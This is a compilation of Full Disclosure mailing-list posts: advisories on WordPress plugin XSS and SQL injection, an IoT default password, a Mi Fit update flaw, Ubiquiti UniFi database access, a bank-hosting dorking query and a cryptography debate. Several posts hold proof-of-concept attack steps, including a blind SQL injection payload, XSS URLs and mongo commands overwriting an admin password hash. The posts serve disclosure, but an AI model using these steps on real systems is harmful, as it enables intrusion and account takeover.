Re: [FD] Anhui Huami Mi Fit Android Application - Unencrypted Update Check
What's the issue here exactly? An attacker can just prevent an the in app update check from realizing it needs to nag the user? The actual update logic and update-ability is controlled through the Play Store, no? -Tim Strazzere On Tue, Nov 26, 2019 at 10:27 AM David Coomber < davidcoomber.info...@gmail.com> wrote: > Anhui Huami Mi Fit Android Application - Unencrypted Update Check > -- > https://www.info-sec.ca/advisories/Huami-Mi-Fit.html > > Overview > > "Mi Fit tracks your activity, analyzes sleep, and evaluates your workouts." > > (https://play.google.com/store/apps/details?id=com.xiaomi.hm.health) > > Issue > > The Anhui Huami Mi Fit Android application (version 4.0.10 and below), > does not encrypt the connection when it checks for an update. > > Impact > > An attacker who can monitor network traffic may be able to tamper with > the application's update function. > > Timeline > > October 21, 2019 - Attempted to obtain a security contact via an email > to supp...@amazfit.com > October 22, 2019 - Provided the details to CERT/CC > October 23, 2019 - CERT/CC opened a case for tracking > November 4, 2019 - Attempted to obtain a security contact via an email > to secur...@xiaomi.com > > Solution > > Upgrade to version 4.0.11 or later > > ___ > Sent through the Full Disclosure mailing list > https://nmap.org/mailman/listinfo/fulldisclosure > Web Archives & RSS: http://seclists.org/fulldisclosure/ > ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Hard-coded credentials on ProGrade/Lierda Grill Temperature Monitor [CVE-2019-15304]
[Author:] Tim Tepatti [Website:] tepatti.com [Title:] Hard-coded credentials on ProGrade/Lierda Grill Temperature Monitor [CVE-2019-15304] [Product:] Grill Temperature Monitor [Manufacturer:] ProGrade / Lierda [Affected Version(s):] V1.00_50006 [Tested Version(s):] V1.00_50006 [Vulnerability Type:] Use of hard-coded credentials (CWE ID 798) [CVE Reference:] CVE-2019-15304 [TL;DR:] ProGrade/Lierda Grill Temperature Monitor V1.00_50006 has a default password of admin for the admin account, which allows an attacker to cause a Denial of Service or Information Disclosure via the undocumented access-point configuration page located on the device. [Long Info:] ProGrade/Lierda Grill Temperature Monitor V1.00_50006 has a default password of admin for the admin account, which allows an attacker to cause a Denial of Service or Information Disclosure via the undocumented access-point configuration page located on the device. The access point configuration page is never made known to the end user - the user is never supposed to access it or change any of the options, and as such, the end user has no idea that an attacker could access this page. This is different than a normal access point or internet router where the administration page is required for setup and configuration, and the end user is made aware of the risk of default credentials. This makes the vulnerability more severe because the attack vector is something which the end user wasn't aware even operated on their device. Additionally, there were two vendors provided because Lierda is a wholesaler who actually created the device, and ProGrade simply re-branded the device for the American market. This way, both customers will be aware of the security vulnerabilities in the product. [Technical Info:] [Default Web Server IP:] 11.11.11.254 [Default Web Server Port:] 80 [Reference(s):] http://progradegrill.com/wifi-grilling-thermometer/ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Multiple banks - potential risk of an inconsequent client separation
Hello together, as many of you already know some german banks are sharing the same hoster. Via google dorking it is possible to determine some customers of one of those hosters (Fiducia & GAD IT AG). The hoster uses a GET parameter called „bankid“ to identify its customers. For example: https://mobilebanking.gad.de/inm/mobilgadptlweb/WebPortal? <https://mobilebanking.gad.de/inm/mobilgadptlweb/WebPortal?bankid=8008>bankid=8008 <https://mobilebanking.gad.de/inm/mobilgadptlweb/WebPortal?bankid=8008> With help of google dorking „inurl:WebPortal?bankid=„ it is possible to enumerate all banks which host their online banking service at Fiducia & GAD IT AG. We checked this via whois on the ip net ranges - where another mistake is done - net name „GAD“ in all whois records. Another indicator for a shared environment (at least some shared systems) is changing the banking id shown in the following example: https://www.apobank.de/ptlweb/WebPortal?bankid=8008 <https://www.apobank.de/ptlweb/WebPortal?bankid=8008> changed to: https://www.apobank.de/ptlweb/WebPortal?bankid=8007 <https://www.apobank.de/ptlweb/WebPortal?bankid=8007> redirects to https://www.vr.de/privatkunden.html <https://www.vr.de/privatkunden.html> In Germany and the EU it is given by law that you have to separate clients data because, e.g. EU-DSGVO. For banks especially BAFIN audits this, too. On the following link you’ll find a cleaned list of dork double results, where are around 85 banks are listed with their bankid. https://data.prosec-networks.com/d/7cf20ee4b17e44ccb402/?dl=1 <https://data.prosec-networks.com/d/7cf20ee4b17e44ccb402/?dl=1> In our oppinion the separation is not given properly, what do you guys think about this? Best regards / Mit freundlichen Grüßen Tim Schughart CEO / Geschäftsführer -- ProSec GmbH Robert-Koch-Straße 1-9 56751 Polch Website: https://www.prosec-networks.com Phone: +49 (0)261 450 930 90 Sitz der Gesellschaft / company domiciled in: Polch Registergericht / registry court: Amtsgericht Koblenz, HRB 26457 Geschäftsführer / chief executive: Tim Schughart USt-IdNr./ VAT ID: DE321817516 “This E-Mail communication may contain CONFIDENTIAL, PRIVILEGED and/or LEGALLY PROTECTED information and is intended only for the named recipient(s). Any unauthorized use, dissemination, copying or forwarding is strictly prohibited. If you are not the intended recipient and have received this email communication in error, please notify the sender immediately, delete it and destroy all copies of this E-Mail. “Diese E-Mail Mitteilung kann VERTRAULICHE, dem BERUFSGEHEIMNIS UNTERLIEGENDE und/oder RECHTLICH GESCHÜTZTE Informationen enthalten und ist ausschließlich für den/die genannten Adressaten bestimmt. Jede unbefugte Nutzung, Weitergabe, Vervielfältigung oder Versendung ist strengstens verboten. Sollten Sie nicht der angegebene Adressat sein und diese E-Mail Mitteilung irrtümlich erhalten haben, informieren Sie bitte sofort den Absender, löschen diese E-Mail und vernichten alle Kopien. ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] YOP Poll 6.0.2 - Reflected XSS (WordPress Plugin)
* Vulnerability: XSS * Affected Software: [YOP Poll](https://wordpress.org/plugins/yop-poll/) * Affected Version: 6.0.2 * Patched Version: 6.0.3 * CVE: not requested * Risk: Medium * Vendor Contacted: 10/25/2018 * Vendor Fix: 11/26/2018 * Public Disclosure: 02/05/2019 * Credit: Tim Coen # CVSS 6.1 Medium [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) # Overview The YOP poll WordPress plugin is vulnerable to reflected XSS as it echoes the poll_id parameter without proper encoding. # Proof of Concept http://192.168.0.103/wordpress/wp-admin/admin.php?page=yop-polls=view-votes_id=1'"> # Timeline - 10/25/2018 Requested email address via contact form - 10/25/2018 Vendor responds, advisory sent - 11/26/2018 Vendor releases fix - 02/05/2019 Confirmed fix & Disclosure # Details & Full Advisory URL https://security-consulting.icu/blog/2019/02/wordpress-yop-poll-xss/ -- PGP Key: https://pgp.mit.edu/pks/lookup?op=get=0x204DCBDD29BA0D89 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] WP Live Chat Support 8.0.17 - Reflected XSS (WordPress Plugin)
* Vulnerability: XSS * Affected Software: [WP Live Chat Support](https://wordpress.org/plugins/wp-live-chat-support/) * Affected Version: 8.0.18 * Patched Version: * CVE: not requested * Risk: Medium * Vendor Contacted: 10/31/2018 * Vendor Fix: 11/01/2018 * Public Disclosure: 02/05/2019 * Credit: Tim Coen # CVSS 6.1 Medium [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) # Overview The WP Live Chat Support WordPress plugin is vulnerable to reflected XSS as it echoes the term parameter without proper encoding. # Proof of Concept http://192.168.0.103/wordpress/wp-admin/admin.php?page=wplivechat-menu-gdpr-page='"> # Timeline - 10/31/2018 Requested email address via contact form - 10/31/2018 Vendor responds, advisory sent - 11/01/2018 Vendor releases fix - 02/05/2019 Confirmed fix & Disclosure # Details & Full Advisory URL https://security-consulting.icu/blog/2019/02/wordpress-wp-livechat-xss/ -- PGP Key: https://pgp.mit.edu/pks/lookup?op=get=0x204DCBDD29BA0D89 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] wpGoogleMaps 7.10.41 - Reflected XSS (WordPress Plugin)
* Vulnerability: XSS * Affected Software: [wpGoogleMaps](https://wordpress.org/plugins/wp-google-maps/) * Affected Version: 7.10.41 * Patched Version: 7.10.43 * CVE: not requested * Risk: Medium * Vendor Contacted: 10/25/2018 * Vendor Fix: 10/31/2018 * Public Disclosure: 02/05/2019 * Credit: Tim Coen # CVSS 6.1 Medium [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) # Overview The wpGoogleMaps WordPress plugin is vulnerable to reflected XSS as it echoes PHP_SELF without proper encoding. # Proof of Concept http://192.168.0.103/wordpress/wp-admin/admin.php/'">?page=wp-google-maps-menu=foo # Timeline - 10/25/2018 Sent advisory - 10/25/2018 Vendor confirms and releases fix - 10/25/2018 Suggested improvement for fix - 10/31/2018 Vendor releases improved fix - 02/05/2019 Disclosure # Details & Full Advisory URL https://security-consulting.icu/blog/2019/02/wordpress-wpgooglemaps-xss/ -- PGP Key: https://pgp.mit.edu/pks/lookup?op=get=0x204DCBDD29BA0D89 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] NextScripts: Social Networks Auto-Poster 4.2.7 - Reflected XSS (WordPress Plugin)
* Vulnerability: XSS * Affected Software: [NextScripts: Social Networks Auto-Poster](https://wordpress.org/plugins/social-networks-auto-poster-facebook-twitter-g/) * Affected Version: 4.2.7 * Patched Version: 4.2.8 * CVE: not requested * Risk: Medium * Vendor Contacted: 10/25/2018 * Vendor Fix: 11/02/2018 * Public Disclosure: 02/05/2019 * Credit: Tim Coen # CVSS 6.1 Medium [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) # Overview The Social Networks Auto-Poster WordPress plugin is vulnerable to reflected XSS as it echoes the `item` parameter without proper encoding. # Proof of Concept http://192.168.0.103/wordpress/wp-admin/admin.php?page=nxssnap-reposter=edit=24'"> # Timeline - 10/25/2018 Requested email address via contact form - 10/29/2018 Vendor supplies email address - 10/31/2018 Advisory sent - 11/02/2018 Vendor releases fix - 02/05/2019 Confirmed fix & Disclosure # Details & Full Advisory URL https://security-consulting.icu/blog/2019/02/wordpress-social-networks-auto-poster-xss/ -- PGP Key: https://pgp.mit.edu/pks/lookup?op=get=0x204DCBDD29BA0D89 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] KingComposer 2.7.6 - Reflected XSS (WordPress Plugin)
* Vulnerability: XSS * Affected Software: [KingComposer](https://wordpress.org/plugins/kingcomposer/) * Affected Version: 2.7.6 * Patched Version: none * CVE: not requested * Risk: Medium * Vendor Contacted: 10/25/2018 * Vendor Fix: none * Public Disclosure: 02/05/2019 * Credit: Tim Coen # CVSS 6.1 Medium [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) # Overview The KingComposer WordPress plugin is vulnerable to reflected XSS as it echoes the id parameter without proper encoding. # Proof of Concept http://192.168.0.103/wordpress/wp-admin/admin.php?page=kc-mapper=<%2Fscript>
[FD] Give 2.3.0 - Reflected XSS (WordPress Plugin)
* Vulnerability: XSS * Affected Software: [Give](https://wordpress.org/plugins/give/) * Affected Version: 2.3.0 * Patched Version: 2.3.1 * CVE: not requested * Risk: Medium * Vendor Contacted: 11/24/2018 * Vendor Fix: 12/13/2018 * Public Disclosure: 02/05/2019 * Credit: Tim Coen # CVSS 6.1 Medium [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) # Overview The Give WordPress plugin is vulnerable to reflected XSS as it echoes various parameter without proper encoding. # Proof of Concept http://localhost/wordpress/wp-admin/edit.php?post_type=give_forms=give-tools=import=import_donations=3%5B0%5D=email%5B1%5D=first_name%5B2%5D=amount%5B3%5D=form_id='"> # Timeline - 11/24/2018 Asked for email address via contact form - 11/24/2018 Vendor responds, advisory sent - 12/13/2018 Vendor releases fix - 02/05/2019 Confirmed fix & Disclosure # Details & Full Advisory URL https://security-consulting.icu/blog/2019/02/wordpress-give-xss/ -- PGP Key: https://pgp.mit.edu/pks/lookup?op=get=0x204DCBDD29BA0D89 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Font_Organizer 2.1.1 - Reflected XSS (WordPress Plugin)
* Vulnerability: XSS * Affected Software: [Font_Organizer](https://wordpress.org/plugins/font-organizer/) * Affected Version: 2.1.1 * Patched Version: none * CVE: not requested * Risk: Medium * Vendor Contacted: 10/25/2018 * Vendor Fix: none * Public Disclosure: 02/05/2019 * Credit: Tim Coen # CVSS 6.1 Medium [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) # Overview The Font_Organizer WordPress plugin is vulnerable to reflected XSS as it echoes the manage_font_id parameter without proper encoding. # Proof of Concept http://192.168.0.103/wordpress/wp-admin/options-general.php?manage_font_id='">=font-setting-admin # Timeline - 10/25/2018 Sent advisory (no response) - 02/05/2019 Disclosure # Details & Full Advisory URL https://security-consulting.icu/blog/2019/02/wordpress-font-organizer-xss/ -- PGP Key: https://pgp.mit.edu/pks/lookup?op=get=0x204DCBDD29BA0D89 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Contact Form Email 7.10.41 - Reflected XSS & CSRF (WordPress Plugin)
* Vulnerability: XSS & CSRF * Affected Software: [Contact Form Email](https://wordpress.org/plugins/contact-form-to-email/) * Affected Version: 1.2.65 * Patched Version: 1.2.66 * CVE: not requested * Risk: Medium * Vendor Contacted: 10/31/2018 * Vendor Fix: 10/31/2018 * Public Disclosure: 02/05/2019 * Credit: Tim Coen ## Reflected XSS # CVSS 6.1 Medium [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) # Overview The Contact Form Email WordPress plugin is vulnerable to reflected XSS as it echoes the item parameter without proper encoding. # Proof of Concept http://192.168.0.103/wordpress/wp-admin/admin.php?page=cp_contactformtoemail=1=1='"> # Code contact-form-to-email/cp_admin_int_edition.inc.php " /> ## CSRF (to XSS) # CVSS 6.1 Medium [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) # Overview The plugin allows the addition of custom JavaScript to forms. Because the request to place this addition is not protected against CSRF, an attacker can place arbitrary JavaScript into the application if an authenticated user visits a webpage containing malicious HTML and/or JavaScript. # Proof of Concept http://192.168.0.103/wordpress/wp-admin/admin.php?page=cp_contactformtoemail=1=1=js; method="POST"> # Timeline - 10/31/2018 Asked for email address via contact form - 10/31/2018 Vendor responds, advisory sent - 10/31/2018 Vendor releases fix - 02/05/2019 Disclosure # Details & Full Advisory URL https://security-consulting.icu/blog/2019/02/wordpress-contact-form-email-xss-csrf/ -- PGP Key: https://pgp.mit.edu/pks/lookup?op=get=0x204DCBDD29BA0D89 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Blog2Social 5.0.2 - Reflected XSS (WordPress Plugin)
* Vulnerability: XSS * Affected Software: [Blog2Social](https://wordpress.org/plugins/blog2social/) * Affected Version: 5.0.2 * Patched Version: 5.0.3 * CVE: not requested * Risk: Medium * Vendor Contacted: 10/25/2018 * Vendor Fix: 11/13/2018 * Public Disclosure: 02/05/2019 * Credit: Tim Coen # CVSS 6.1 Medium [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) # Overview The Blog2Social WordPress plugin is vulnerable to reflected XSS as it echoes the b2s_update_publish_date parameter without proper encoding. # Proof of Concept http://192.168.0.103/wordpress/wp-admin/admin.php?page=blog2social-ship=70_action=1_update_publish_date='"> # Timeline - 10/25/2018 Sent advisory - 10/26/2018 Vendor confirms recipt of advisory - 11/13/2018 Vendor releases fix - 02/05/2019 Confirmed Fix & Disclosure # Details & Full Advisory URL https://security-consulting.icu/blog/2019/02/wordpress-blog2social-xss/ -- PGP Key: https://pgp.mit.edu/pks/lookup?op=get=0x204DCBDD29BA0D89 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Quiz And Survey Master 6.0.4 - Reflected XSS (WordPress Plugin)
* Vulnerability: XSS * Affected Software: [Quiz And Survey Master](https://wordpress.org/plugins/quiz-master-next/) * Affected Version: 6.0.4 * Patched Version: none * CVE: not requested * Risk: Medium * Vendor Contacted: 10/25/2018 * Vendor Fix: none * Public Disclosure: 02/05/2019 * Credit: Tim Coen # CVSS 6.1 Medium [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) # Overview The Quiz And Survey Master WordPress plugin is vulnerable to reflected XSS as it echoes the quiz_id parameter without proper encoding. # Proof of Concept http://192.168.0.103/wordpress/wp-admin/admin.php?page=mlw_quiz_results_id='"> # Timeline - 10/25/2018 Sent advisory (no response) - 02/05/2019 Disclosure # Details & Full Advisory URL https://security-consulting.icu/blog/2019/02/wordpress-quiz-and-survey-master-xss/ -- PGP Key: https://pgp.mit.edu/pks/lookup?op=get=0x204DCBDD29BA0D89 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Forminator 1.5.4 - Unauthenticated Persistent XSS, Blind SQL Injection (WordPress Plugin)
* Vulnerability: Unauthenticated Persistent XSS, Blind SQL Injection * Affected Software: [Forminator](https://wordpress.org/plugins/forminator/) * Affected Version: 1.5.4 * Patched Version: 1.6 * CVE: not requested * Risk: High * Vendor Contacted: 11/25/2018 * Vendor Fix: 12/10/2018 * Public Disclosure: 02/05/2019 * Credit: Tim Coen ## Unauthenticated Persistent XSS via poll # CVSS 7.2 High [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N) # Details Custom fields of a poll are not properly encoded when showing results of a poll, leading to persistent XSS. # Proof of Concept Prerequisite: create a poll, add a custom input field, publish the poll. An attacker can place the payload - for example `'">` - in the custom input field. To trigger the payload, view the submissions of the poll. ## Authenticated Blind SQL Injection: Delete Submission # CVSS High 8.1 [CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H) # Overview The action of deleting submissions is vulnerable to blind SQL injection. An attacker can exploit this to extract data from the database. An account with the permission to delete submissions is required. # Proof of Concept - View submissions, eg at http://192.168.0.103/wordpress/wp-admin/admin.php?page=forminator-entries_type=forminator_forms_id=133 - check the checkbox of one submission, use bulk action -> delete entries - apply the action and intercept or replay the request - change the `entry[]` value to contain an SQL payload, eg: 1) or sleep(5)--x- # Timeline - 11/25/2018 Asked for email address via contact form - 11/25/2018 Vendor responds, advisory sent - 12/10/2018 Vendor releases fix - 02/05/2019 Disclosure # Details & Full Advisory URL https://security-consulting.icu/blog/2019/02/wordpress-forminator-persistent-xss-blind-sql-injection/ -- PGP Key: https://pgp.mit.edu/pks/lookup?op=get=0x204DCBDD29BA0D89 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] [RT-SA-2016-001] Padding Oracle in Apache mod_session_crypto
Hi Erik, Thanks for backing me up on a number of things. Only one response below. > > In light of that, there's > > nothing particularly wrong with using CBC, if it is implemented well. > > At least, using it is not *more* wrong than using OFB, CFB, or CTR > > That is wrong. CBC mode allows attacks such as "Sweet32" > (https://sweet32.info/), which is not possible with CTR mode. The site you linked mentioned 64bit block ciphers are vulnerable, even in CTR mode. Obviously the birthday "paradox" applies. Regardless of how right or wrong you are about Sweet32, this far from the most important thing *implementors* should be worried about. Obviously if they start with AES, then the birthday paradox issues are vastly reduced. Any new system should be avoiding the likes of 3DES, Blowfish, etc. So it seems moot. On the flip side, tell me what the impact is of these two scenarios where a developer follows *some* of our advice: (A) They use AES in CBC mode and apply an HMAC to the cipehrtext. They actually validate that HMAC before decrypting. However, they fail to use a unique IV for every message. (B) They use AES in CTR mode and apply an HMAC to the cipehrtext. They actually validate that HMAC before decrypting. However, they fail to use a unique IV for every message. Which is worse? Obviously (B) fails pretty catastrophically. (A) is not great, but at least the plaintext isn't nearly as easy to expose (usually only minor block-level information leaks). In the real world I see these kinds of mistakes all of the time. So be careful of steering people toward a mode that doesn't degrade as gracefully when developers make mistakes. They invariably will do so, unless they've spent as much time with crypto as you and I. tim PS- And to re-iterate, we shouldn't ask them to use any particular cipher mode, but instead to use something off the shelf. ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] [RT-SA-2016-001] Padding Oracle in Apache mod_session_crypto
> > res = apr_crypto_passphrase(, , passphrase, > > strlen(passphrase), (unsigned char *) (), sizeof(apr_uuid_t), > > *cipher, APR_MODE_CBC, 1, 4096, f, r->pool); > > CBC. Again. > > The earliest mention of CFB which I know is dated 1989. > The earliest mention of CTR which I know is dated 1990-ies. > > But there still are people who use CBC... > > Please, PLEASE, PPLAASSSE don't use it. Instead, use either > Blowfish in CFB mode or at least Rijndael (AES) in CTR (or GCM) > mode - both are available, for example, in the OpenSSL library. All traditional modes that lack integrity protection are vulnerable to chosen-ciphertext attacks in these kinds of scenarios. CFB isn't immune and CTR is catastrophically weak. All traditional modes need a MAC or similar integrity protection. In light of that, there's nothing particularly wrong with using CBC, if it is implemented well. At least, using it is not *more* wrong than using OFB, CFB, or CTR without integrity protection. GCM is fine if the implementation is sound and the IVs never repeat, but there are pitfalls. We should instead be pointing developers in the direction of using something off-the-shelf, such as libsodium. Much less room for error. tim ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Ubiquiti
Hi, please let us communicate directly and not via Mailinglists, because this results in flooding and is not important to all other people. If there is an final result, weather the PoC has got an mistake or not, we can publish the result. If there are other products affected we don’t know - this was not mentioned in the disclosure (The PoC is only for the OS X Software combined with an AP AC Lite), so we can’t give an statement to other products of the vendor. If nobody is able to get the PoC working, like I said above, maby we made an mistake, I will not distance me from making a mistake, I think the vuln should not be seen as too critical. But what you all approved is that if the database runs locally the following scenario should be bullet proof: All, by the management software, managed devices could be compromised if the pc get’s infected, because the database has absolutely no authentication and you are able to reset the local admins web interface password. This would reduce the CVSSv3 to 6.3 and change they vuln type to „privilege escalation“, combined with broken authentication even without an "scope change": CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H Do you agree? I’m looking forward to minimize our "race time condition denial of service", to deliver fast results in future :-P Best regards / Mit freundlichen Grüßen Tim Schughart CEO / Geschäftsführer -- ProSec Networks e.K. Ellingshohl 82 56076 Koblenz Website: https://www.prosec-networks.com E-Mail: t.schugh...@prosec.networks.com Mobile: +49 (0)157 7901 5826 Phone: +49 (0)261 450 930 90 "This E-Mail communication may contain CONFIDENTIAL, PRIVILEGED and/or LEGALLY PROTECTED information and is intended only for the named recipient(s). Any unauthorized use, dissemination, copying or forwarding is strictly prohibited. If you are not the intended recipient and have received this email communication in error, please notify the sender immediately, delete it and destroy all copies of this E-Mail. VAT ID: DE290654714 legal domicile Koblenz, HRA 21621.“ "Diese E-Mail Mitteilung kann VERTRAULICHE, dem BERUFSGEHEIMNIS UNTERLIEGENDE und/oder RECHTLICH GESCHÜTZTE Informationen enthalten und ist ausschließlich für den/die genannten Adressaten bestimmt. Jede unbefugte Nutzung, Weitergabe, Vervielfältigung oder Versendung ist strengstens verboten. Sollten Sie nicht der angegebene Adressat sein und diese E-Mail Mitteilung irrtümlich erhalten haben, informieren Sie bitte sofort den Absender, löschen diese E-Mail und vernichten alle Kopien. USt-IdNr.: DE290654714, Amtsgericht Koblenz, HRA 21621." ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] Critical Vulnerability in Ubiquiti UniFi
Hi Carlos, you are correct that mongo is bound to 127.0.0.1 only. But you are able to get it remote if you are using the Unify Controller Software. So the db gets tunneled to your device. Test environment: 1. I have configured the AP to our network. 2. I have removed every piece of software for configuring the ap. 3. I have installed the Unify Manager (for Mac 5.2.7.) 4. I’m able to connect to the database via 127.0.0.1 Network topology: The access point is cabled to a AVM FritzBox. Our test client is connected via W-Lan provided by FritzBox - so there is no direct connection to the ap. Best regards Tim Schughart > Am 01.10.2016 um 15:30 schrieb Carlos Silva <r3...@r3pek.org>: > > Hi Tim! > > I can be missing something here but I just checked this on a fresh installed > Unifi Controller and mongod is binding to localhost making this a non-issue. > Or, you have to get a remote shell first before you can get a connection to > the DB. Am I missing something? > > Thanks, > Carlos Silva > > On Fri, Sep 30, 2016 at 10:49 AM, Tim Schughart > <t.schugh...@prosec-networks.com> wrote: > Hello @all, > > together with my colleague we found two uncritical vulnerabilities you'll > find below. > > Product: UniFi AP AC Lite > Vendor: Ubiquiti Networks Inc. > > Internal reference: ? (Bug ID) > Vulnerability type: Incorrect access control > Vulnerable version: Unify 5.2.7 and possible other versions affected (not > tested) > Vulnerable component: Database > Report confidence: yes > Solution status: Not fixed by Vendor, the bug is a feature. > Fixed versions: - > Researcher credits: Tim Schughart, Immanuel Bär, Khanh Quoc Pham of ProSec > Networks > Solution date: - > Public disclosure: 2016-09-30 > CVE reference: CVE-2016-7792 > CVSSv3: 8.8 AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H > > > Vulnerability Details: > You are able to connect to the access points database, because of an broken > authentication (OWASP TOP10). So you are able to modify the database and read > the data. An possible scenario you'll find in PoC section. > > Risk: > An attacker gets access to the database and for e.g. is able to change the > admins password, like you see in PoC below. > > PoC: > 1. Generate SHA512 Hash with e.g. > mkpasswd -m sha-512 > > 2. Connect via network to database, e.g. : > mongo --port 27117 --host target_ip > > 3. Change password via command > "db.admin.update({"name":"ProSec"}, {$set : {"x_shadow": > > "$6$Se9i5I7k3hI8d4bk$CqEXRUwk7c7A/62E/HcC4SrMSLOrBdm7wRvwTS4t.nNJA3RYta0RfzJpuREg.qcAHsPGW9Gjwm3krJROXzbCv."}})" > 4. Login via web interface with new password > > > Best regards / Mit freundlichen Grüßen > > > Tim Schughart > CEO / Geschäftsführer > > -- > ProSec Networks e.K. > Ellingshohl 82 > 56077 Koblenz > > Website: https://www.prosec-networks.com > E-Mail: t.schugh...@prosec.networks.com > Mobile: +49 (0)157 7901 5826 > Phone: +49 (0)261 450 930 90 > > "This E-Mail communication may contain CONFIDENTIAL, PRIVILEGED and/or > LEGALLY PROTECTED information and is intended only for the named > recipient(s). Any unauthorized use, dissemination, copying or forwarding is > strictly prohibited. If you are not the intended recipient and have received > this email communication in error, please notify the sender immediately, > delete it and destroy all copies of this E-Mail. VAT ID: DE290654714 legal > domicile Koblenz, HRA 21625.“ > > "Diese E-Mail Mitteilung kann VERTRAULICHE, dem BERUFSGEHEIMNIS UNTERLIEGENDE > und/oder RECHTLICH GESCHÜTZTE Informationen enthalten und ist ausschließlich > für den/die genannten Adressaten bestimmt. Jede unbefugte Nutzung, > Weitergabe, Vervielfältigung oder Versendung ist strengstens verboten. > Sollten Sie nicht der angegebene Adressat sein und diese E-Mail Mitteilung > irrtümlich erhalten haben, informieren Sie bitte sofort den Absender, löschen > diese E-Mail und vernichten alle Kopien. USt-IdNr.: DE290654714, Amtsgericht > Koblenz, HRA 21625." > > ___ > Sent through the Full Disclosure mailing list > https://nmap.org/mailman/listinfo/fulldisclosure > Web Archives & RSS: http://seclists.org/fulldisclosure/ > ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Critical Vulnerability in Ubiquiti UniFi
